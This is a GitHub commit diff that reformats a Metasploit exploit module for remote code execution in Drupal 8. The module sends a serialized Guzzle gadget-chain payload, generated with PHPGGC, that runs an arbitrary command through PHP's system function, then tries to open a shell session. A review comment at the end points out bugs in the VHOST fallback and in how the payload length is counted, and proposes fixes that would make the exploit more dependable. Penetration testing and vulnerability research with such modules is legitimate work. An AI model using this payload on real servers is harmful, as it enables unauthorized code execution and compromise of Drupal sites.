Code smells and documentation

master
rotemreiss 2019-02-25 15:21:46 -05:00 committed by GitHub
parent 54ce49c4e6
commit edf7c41478
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 25 deletions


@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown
end
# Generate random string to validate if the RCE worked
# Generate random string to validate if the RCE worked
token = Rex::Text.rand_text_alphanumeric(8..42)
res = execute_command("printf #{token}")
@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Try to get shell
execute_command(payload.encoded)
sleep(2)
return if session_created?
@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = exploit_drupal8(cmd)
if res && res.code == 422
print_error "Exploit failed, in case that VHOST was not defined, consider to set that option"
print_error "Exploit failed, in case that VHOST was not defined, consider to set that option"
end
if res && res.code != 403
@ -121,10 +121,10 @@ class MetasploitModule < Msf::Exploit::Remote
# Custom implementation of full_uri to take the vhost if exists, since the exploit may not work when using IP
# @see full_uri
def vhost_full_uri
host = "#{datastore['VHOST']}" || "#{rhost}"
if !datastore['VHOST']
print_warning "The exploit may not work when using IP instead of host name, consider to set VHOST option"
end
host = "#{datastore['VHOST']}" || "#{rhost}"
if !datastore['VHOST']
print_warning "The exploit may not work when using IP instead of host name, consider to set VHOST option"
end
uri_scheme = ssl ? 'https' : 'http'
uri_port = rport.to_s == '80' ? '' : ":#{rport}"
@ -137,28 +137,24 @@ class MetasploitModule < Msf::Exploit::Remote
uri = normalize_uri(target_uri.path, 'node')
# @todo Support other formats ?
vars_get = {
'_format' => 'hal_json'
}
vars_get = {'_format' => 'hal_json'}
# Get the command length for the payload
cmd_len = cmd.length.to_s
data = {
"link" => [
{
"value" => "link",
# The payload was generated using PHPGGC: `./phpggc guzzle/rce1 system id --json`
# @see https://www.ambionics.io/blog/drupal8-rce
"options" => "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:#{cmd_len}:\"#{cmd}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links" => {
"type" => {
"href" => "#{vhost_full_uri}rest/type/shortcut/default"
}
}
}
"link" => [{
"value" => "link",
# The payload was generated using PHPGGC: `./phpggc guzzle/rce1 system id --json`
# @see https://www.ambionics.io/blog/drupal8-rce
"options" => "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:#{cmd_len}:\"#{cmd}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}],
"_links" => {
"type" => {
"href" => "#{vhost_full_uri}rest/type/shortcut/default"
}
}
}
send_request_cgi(
'method' => 'POST',
@ -168,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote
'data' => data.to_json
)
end
end
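Review bot: The VHOST fallback in vhost_full_uri, `host = "#{datastore['VHOST']}" || "#{rhost}"`, never takes effect: interpolating a nil option yields `""`, which is truthy in Ruby, so `rhost` is never used and the `_links.type.href` built from this value carries an empty host whenever VHOST is unset (the method's return statement lies outside the hunk, so the exact joined form is not visible here). The warning two lines below and the 422 hint in exploit_drupal8 both presume rhost is the fallback, so the intended line appears to be `host = datastore['VHOST'] || rhost`; this line is carried over unchanged by the commit rather than introduced by it. Separately, exploit_drupal8 sizes the serialized string with `cmd.length`, which counts characters, while PHP's unserialize reads byte lengths; `cmd_len = cmd.bytesize.to_s` keeps the gadget chain valid should a payload ever contain multi-byte characters.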